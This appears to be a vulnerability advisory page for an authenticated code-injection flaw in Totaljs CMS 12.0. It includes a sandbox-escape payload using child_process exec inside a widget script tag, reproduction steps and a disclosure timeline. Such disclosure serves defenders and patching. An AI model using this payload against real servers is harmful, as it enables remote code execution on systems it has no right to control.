Totaljs CMS 12.0 Widget Creation Code Injection

2019.09.05

Credit: Riccardo Krauter

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-94

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup
[+] Title: Totaljs CMS Authenticated Code injection on widget creation.
[+] Affected software: Totaljs CMS 12.0
[+] Description:
An authenticated user with “widgets” privilege can gain RCE on the
remote server by creating a malicious widget with a special tag
containing java-script code that will be evaluated server side.
In the process of evaluating the tag by back-end is possible to escape
the sandbox object by using the following payload:
<script
total>global.process.mainModule.require(‘child_process’).exec(‘RCE
here’);</script>
[+] Step to reproduce:
1) browse to http://localhost:8000/admin/widgets/
2) click on create
3) paste the payload in the source code filed
4) click on save
[+] Project link: https://github.com/totaljs/cms
[+] Original report and details:
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf
[+] Timeline:
- 13/02/2019 -> reported the issue to the vendor
.... many ping here
- 18/06/2019 -> pinged the vendor last time
- 30/08/2019 -> reported to seclist

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Totaljs CMS 12.0 Widget Creation Code Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.